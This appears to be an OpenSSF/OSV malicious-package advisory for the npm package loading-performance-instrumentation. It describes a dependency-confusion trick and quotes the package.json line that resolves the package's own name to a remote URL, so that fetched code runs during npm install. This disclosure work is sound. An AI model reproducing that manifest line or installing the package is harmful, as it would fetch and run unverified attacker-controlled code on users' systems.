OpenSSF/OSV advisory MAL-2026-15539 confirms this npm version as malicious. package.json line 11 declares a dependency whose source is a bare URL rather than a registry version range: "loading-performance-instrumentation": "https://repo.securityctrl.com/loading-performance-instrumentation". The dependency key equals the package's own name (dependency-confusion shape). On `npm install`, npm fetches whatever bytes repo.securityctrl.com returns for that path and installs them into...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in loading-performance-instrumentation (npm)
Details
package.json line 11 declares a dependency whose source is a bare URL rather than a registry version range: "loading-performance-instrumentation": "https://repo.securityctrl.com/loading-performance-instrumentation". The dependency key equals the package's own name (dependency-confusion shape). On `npm install`, npm fetches whatever bytes repo.securityctrl.com returns for that path and installs them into node_modules, running any lifecycle scripts contained inside the fetched tarball. There is no version pin, no integrity hash, and no commit SHA — the content at that URL can change at any time. The README frames the package as a placeholder to prevent dependency confusion, but the manifest itself resolves the same name to a third-party host, contradicting that framing. The shipped code in this tarball is an inert stub; the manifest URL is the entire install-time payload path.
Decision reason
OpenSSF Malicious Packages via OSV confirms loading-performance-instrumentation@45.0.0 as malicious (MAL-2026-15539): Malicious code in loading-performance-instrumentation (npm)